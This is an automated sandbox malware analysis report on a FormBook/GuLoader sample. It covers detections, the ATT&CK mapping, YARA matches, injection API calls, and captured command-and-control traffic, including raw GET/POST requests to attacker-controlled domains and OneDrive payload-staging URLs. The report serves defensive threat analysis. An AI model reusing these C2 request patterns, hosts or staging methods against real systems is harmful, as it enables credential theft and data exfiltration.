Loading ...

Play interactive tourEdit tour

Analysis Report ___ __ ___.bin

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:221188
Start date:08.04.2020
Start time:15:07:02
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 16m 26s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:___ __ ___.bin (renamed file extension from bin to exe)
Cookbook file name:default.jbs
Analysis system description:Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Java 8.0.1440.1, Flash 30.0.0.113)
Number of analysed new started processes analysed:20
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:1
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.rans.troj.spyw.evad.winEXE@27/13@19/2
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 33.3% (good quality ratio 30.5%)
  • Quality average: 71.8%
  • Quality standard deviation: 30%
HCA Information:
  • Successful, ratio: 94%
  • Number of executed functions: 171
  • Number of non-executed functions: 144
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • Excluded IPs from analysis (whitelisted): 13.107.42.13, 13.107.42.12
  • Excluded domains from analysis (whitelisted): l-0004.l-msedge.net, odc-web-brs.onedrive.akadns.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, odc-dm-files-geo.onedrive.akadns.net, odc-dm-files-brs.onedrive.akadns.net, odc-dm-files.onedrive.akadns.net.l-0003.dc-msedge.net.l-0003.l-msedge.net, l-0003.l-msedge.net, odc-web-geo.onedrive.akadns.net
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
FormBook GuLoader
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification Spiderchart

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting11Registry Run Keys / Startup Folder21Process Injection512Software Packing1Credential Dumping1Security Software Discovery23Remote File Copy1Man in the Browser1Data Encrypted1Remote File Copy1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaExecution through Module Load1Port MonitorsAccessibility FeaturesDisabling Security Tools1Network SniffingFile and Directory Discovery2Remote ServicesData from Local System1Exfiltration Over Other Network MediumStandard Cryptographic Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesGraphical User Interface1Accessibility FeaturesPath InterceptionDeobfuscate/Decode Files or Information1Input CaptureSystem Information Discovery3Windows Remote ManagementEmail Collection1Automated ExfiltrationStandard Non-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseCommand-Line Interface1System FirmwareDLL Search Order HijackingScripting11Credentials in FilesQuery Registry1Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol3SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessObfuscated Files or Information3Account ManipulationVirtualization/Sandbox Evasion13Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceMasquerading3Brute ForceProcess Discovery2Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskVirtualization/Sandbox Evasion13Two-Factor Authentication InterceptionRemote System Discovery1Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionProcess Injection512Bash HistoryNetwork Service ScanningRemote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessDLL Side-Loading1Input PromptSystem Network Connections DiscoveryWindows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: ___ __ ___.exeVirustotal: Detection: 20%Perma Link
Source: ___ __ ___.exeReversingLabs: Detection: 34%
Yara detected FormBookShow sources
Source: Yara matchFile source: 00000007.00000002.1159029290.00030000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.1133249944.00030000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.1133299264.00060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000011.00000002.1439121827.006C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000008.00000000.1108604549.06460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000011.00000002.1438365388.00030000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000013.00000002.1410061454.00D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.1162285538.1DB00000.00000040.00000001.sdmp, type: MEMORY
Antivirus or Machine Learning detection for unpacked fileShow sources
Source: 15.1.IconCache-ze.exe.1df70000.1.unpackAvira: Label: TR/Dropper.Gen
Source: 1.1.___ __ ___.exe.1da30000.1.unpackAvira: Label: TR/Dropper.Gen
Source: 15.2.IconCache-ze.exe.13a0000.0.unpackAvira: Label: TR/Dropper.Gen
Source: 1.2.___ __ ___.exe.1460000.1.unpackAvira: Label: TR/Dropper.Gen

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)Show sources
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 4x nop then jmp 1EF67098h7_2_1EF67072
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 4x nop then jmp 1EFEB9BEh7_2_1EF545E6
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 4x nop then mov edi, edi7_2_1EF5055C
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 4x nop then shl edi, 05h17_2_1ED41E4C
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 4x nop then jmp 1ED77098h17_2_1ED77072
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 4x nop then jmp 1EDFB9BEh17_2_1ED645E6

Networking:

barindex
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /sa22/?4hllG4c0=9W++Sllu7asCPnt7c6bHhsH55K7Vj/VEi/un24Pfn90An80eS7zCOl8dh/5Lt5EUN1tCIA==&7nNh=t4YTida0vzmLbh HTTP/1.1Host: www.johnwolfesculpture.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /sa22/?4hllG4c0=COHCH7zZrV9rvmj1R6i27nEdgcs+lDhmU4bL/SPZGIMCDIh03pCouR0/1sz1fcAvGJ0DNA==&7nNh=t4YTida0vzmLbh&sql=1 HTTP/1.1Host: www.korrela.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /sa22/?4hllG4c0=9W++Sllu7asCPnt7c6bHhsH55K7Vj/VEi/un24Pfn90An80eS7zCOl8dh/5Lt5EUN1tCIA==&7nNh=t4YTida0vzmLbh HTTP/1.1Host: www.johnwolfesculpture.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /sa22/?4hllG4c0=COHCH7zZrV9rvmj1R6i27nEdgcs+lDhmU4bL/SPZGIMCDIh03pCouR0/1sz1fcAvGJ0DNA==&7nNh=t4YTida0vzmLbh&sql=1 HTTP/1.1Host: www.korrela.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Found strings which match to known social media urlsShow sources
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: onedrive.live.com
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.korrela.comConnection: closeContent-Length: 205614Cache-Control: no-cacheOrigin: http://www.korrela.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.korrela.com/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 6c 6c 47 34 63 30 3d 4b 73 4c 34 5a 63 58 56 70 79 46 73 6e 78 44 70 63 63 32 68 70 54 30 6e 67 70 51 49 79 52 31 55 4f 50 71 66 35 69 28 35 52 6f 55 43 47 49 70 4e 30 34 4f 41 36 42 64 54 70 38 54 75 54 39 77 75 48 5a 34 36 4f 70 78 4e 61 36 6b 4b 6e 41 53 4c 4e 6f 74 6d 34 74 45 31 67 46 38 33 39 75 52 31 76 66 54 6f 34 77 44 52 44 79 4d 64 6e 53 74 66 30 33 58 63 6c 4b 79 31 34 68 74 7a 49 47 59 54 6d 56 76 69 6b 5f 4a 37 72 51 47 32 52 77 58 38 4a 58 28 41 78 58 79 31 73 5f 32 4d 54 49 53 47 50 51 64 50 34 7a 72 7a 54 5f 48 59 30 74 6c 7a 69 62 6a 6d 4a 7a 77 49 50 64 33 5f 49 50 52 56 33 70 31 34 59 56 63 39 4c 68 57 66 6f 78 67 47 6d 74 32 47 42 52 77 58 6e 76 54 46 61 43 45 63 79 6c 39 55 7e 65 28 31 43 73 4c 44 38 43 61 4e 74 52 69 71 68 70 66 6b 64 46 76 6e 4f 77 35 58 4f 75 64 77 50 54 59 41 51 65 6a 54 65 55 59 57 69 71 78 37 64 6b 43 5a 71 42 42 79 54 54 43 33 6f 44 42 62 42 33 6a 59 6a 48 53 71 48 4f 7e 6a 53 6c 7a 50 4c 46 67 33 7a 4e 73 44 4d 69 38 58 71 69 68 37 7a 74 38 49 36 6e 68 55 49 56 44 58 78 6d 52 35 4d 48 36 55 71 30 77 4b 6c 54 70 2d 6f 7a 65 66 70 4c 65 6a 56 69 43 70 6b 63 4b 61 74 47 46 37 38 38 6d 74 70 53 39 53 51 2d 4b 42 6f 6e 36 4d 47 4f 55 61 70 6d 34 73 57 34 68 31 76 6e 5a 44 79 43 33 32 54 4f 39 71 79 38 71 39 37 4c 73 34 41 77 32 6c 75 30 51 46 74 7a 47 57 42 2d 77 69 65 38 38 42 36 7a 50 31 48 6d 53 5f 4f 31 38 43 76 56 30 2d 65 35 33 37 57 73 52 5f 66 63 78 33 4e 48 30 54 50 55 55 70 30 31 72 71 72 31 43 53 64 72 4c 71 4d 59 30 74 56 72 4f 63 41 6f 6d 79 38 72 76 53 73 4a 50 51 75 72 61 77 63 77 6a 54 6b 30 69 66 75 48 58 4f 58 4e 44 39 30 41 34 6c 54 72 6b 31 74 31 36 43 7a 4a 74 76 48 39 5a 4d 58 2d 77 43 4d 58 62 51 52 56 51 49 31 4f 4e 7a 6c 46 65 37 79 4f 55 47 32 2d 70 74 35 77 4f 33 79 66 63 52 34 64 37 65 37 73 46 67 4f 62 53 7a 28 55 73 33 36 70 43 53 56 74 6d 4a 39 6c 30 4d 62 50 68 45 55 71 28 58 54 46 45 57 59 67 30 70 51 78 58 33 64 46 7e 55 73 72 71 75 4b 70 66 61 49 75 77 31 4e 79 77 47 72 62 75 4e 7a 74 28 44 6e 56 54 74 41 33 61 69 51 79 56 7a 62 70 31 31 47 42 36 45 57 55 46 54 58 79 50 36 62 5f 70 67 73 46 35 47 71 54 70 7a 79 52 68 4b 64 39 7a 71 4c 59 47 65 41 77 54 30 4c 7a 66 39 4a 6d 28 72 4e 31 49 6e 7e 7a 76 4d 71 61 4d 2d 66 71 30 32 41 52 76 32 35 67 30 4d 79 6f 33 54 67 5f 51 53 44 65 49 39 56 71 7e 69 48 4b 67 7a 54 41 4c 71 67 66 4e 34 73 6e 31 39 32 6c 50 47 58 76 51 41 44 6f 38 44 34 62 4d 4e 52 5f 6a 52 65 4e 38 77 71 39 4b 64 4e 39 69 59 32 69 79 68 67 56 50 77 57 70 55 6c 6a 42 75 6f 38 56 46 77 75 63 28 32 61 59 72 49 77 4c 6b 5a 38 62 6e 58 6e 69 61 49 64 4f 79 4f 42 43 32 6e 34 6e
Urls found in memory or binary dataShow sources
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmpString found in binary or memory: http://crl.use:
Source: filename1.exe, 00000005.00000002.1133998962.00380000.00000004.00000001.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: filename1.exe, 00000005.00000002.1133998962.00380000.00000004.00000001.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0:
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: filename1.exe, 00000005.00000002.1133998962.00380000.00000004.00000001.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.msocsp.com0
Source: explorer.exe, 00000008.00000000.1099532414.03A10000.00000008.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000008.00000000.1094514514.01ED0000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: msiexec.exe, 0000000A.00000003.1406418600.02730000.00000004.00000001.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1162524004.1E960000.00000004.00000001.sdmpString found in binary or memory: https://hmhxvw.dm.files.1drv.com/
Source: filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmpString found in binary or memory: https://hmhxvw.dm.files.1drv.com/_uGU
Source: filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmpString found in binary or memory: https://hmhxvw.dm.files.1drv.com/iuGU
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmpString found in binary or memory: https://hmhxvw.dm.files.1drv.com/y4mAymrJf7IYgOPTMcPi41l7VVW4reXsUzeWk4GGUou_YzD01AFJEaZ7ABDYRMDGPyt
Source: filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438508200.002B9000.00000004.00000020.sdmpString found in binary or memory: https://hmhxvw.dm.files.1drv.com/y4mEr9yH-7ZhFAs2uIfcjGadw4DGbDySo2uw6humDzXMDq7iXT0aM0o4AD9ipAnxEae
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000005.00000002.1134830566.00669000.00000004.00000020.sdmpString found in binary or memory: https://hmhxvw.dm.files.1drv.com/y4mWwNJZbf4oaC_H7wnwZA-YVmc5AReGkKXkUEvZkWkVTWZIoh8T0hIhbHq0o3SR8zp
Source: filename1.exe, 00000007.00000002.1162524004.1E960000.00000004.00000001.sdmpString found in binary or memory: https://hmhxvw.dm.files.1drv.com/y4mjC0TasxG1CU0TWh2nSpMfrTbhENVZK9AmoCbn0tqjuMrPXMqk3OLxNyIPRG_vKIv
Source: filename1.exe, 00000005.00000002.1134830566.00669000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159547568.00329000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438508200.002B9000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/
Source: filename1.exe, 00000007.00000002.1159547568.00329000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/3
Source: filename1.exe, 00000011.00000003.1391201051.002D7000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=569F732A389E1EA2&resid=569F732A389E1EA2%21411&authkey=ABTtM_3
Source: filename1.exe, 00000005.00000002.1134926288.006BE000.00000004.00000020.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: filename1.exe, 00000005.00000002.1133998962.00380000.00000004.00000001.sdmp, filename1.exe, 00000007.00000002.1159669323.00391000.00000004.00000020.sdmp, filename1.exe, 00000011.00000002.1438618464.00301000.00000004.00000020.sdmpString found in binary or memory: https://www.digicert.com/CPS0

E-Banking Fraud:

barindex
Yara detected FormBookShow sources
Source: Yara matchFile source: 00000007.00000002.1159029290.00030000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.1133249944.00030000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.1133299264.00060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000011.00000002.1439121827.006C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000008.00000000.1108604549.06460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000011.00000002.1438365388.00030000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000013.00000002.1410061454.00D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.1162285538.1DB00000.00000040.00000001.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 00000013.00000002.1409626473.003DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000007.00000002.1159029290.00030000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.1159029290.00030000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.1133249944.00030000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.1133249944.00030000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.1133299264.00060000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.1133299264.00060000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.1439121827.006C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.1439121827.006C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000000.1108604549.06460000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000000.1108604549.06460000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.1438365388.00030000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.1438365388.00030000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.1410061454.00D60000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.1410061454.00D60000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.1162285538.1DB00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.1162285538.1DB00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Potential malicious icon foundShow sources
Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
Contains functionality to call native functionsShow sources
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 0_2_003EA414 NtProtectVirtualMemory,0_2_003EA414
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 0_2_003EA8D2 NtResumeThread,0_2_003EA8D2
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 0_2_003E050D NtSetInformationThread,TerminateProcess,0_2_003E050D
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 0_2_003E0504 NtSetInformationThread,0_2_003E0504
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 0_2_003E3586 NtWriteVirtualMemory,0_2_003E3586
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 0_2_003E4BDA NtAllocateVirtualMemory,0_2_003E4BDA
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 0_2_003E3A51 NtWriteVirtualMemory,0_2_003E3A51
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 0_2_003EA8E0 NtResumeThread,0_2_003EA8E0
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 0_2_003E38CC NtWriteVirtualMemory,0_2_003E38CC
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 0_2_003EB2C5 NtResumeThread,0_2_003EB2C5
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 0_2_003E3738 NtWriteVirtualMemory,0_2_003E3738
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 0_2_003EA52A NtProtectVirtualMemory,0_2_003EA52A
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 0_2_003E0511 NtSetInformationThread,TerminateProcess,0_2_003E0511
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 0_2_003E35BC NtWriteVirtualMemory,0_2_003E35BC
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 0_2_003E3DA8 NtWriteVirtualMemory,0_2_003E3DA8
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 0_2_003E3BF4 NtWriteVirtualMemory,0_2_003E3BF4
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 1_2_0015A414 NtProtectVirtualMemory,1_2_0015A414
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 1_2_00150504 NtSetInformationThread,1_2_00150504
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 1_2_0015050D NtSetInformationThread,TerminateProcess,1_2_0015050D
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 1_2_00154BDA NtAllocateVirtualMemory,1_2_00154BDA
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 1_2_00150511 NtSetInformationThread,TerminateProcess,1_2_00150511
Source: C:\Users\user\Desktop\___ __ ___.exeCode function: 1_2_0015A52A NtProtectVirtualMemory,1_2_0015A52A
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 2_2_003EA414 NtProtectVirtualMemory,2_2_003EA414
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 2_2_003EA8D2 NtResumeThread,2_2_003EA8D2
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 2_2_003E050D NtSetInformationThread,TerminateProcess,2_2_003E050D
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 2_2_003E0504 NtSetInformationThread,2_2_003E0504
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 2_2_003E3586 NtWriteVirtualMemory,2_2_003E3586
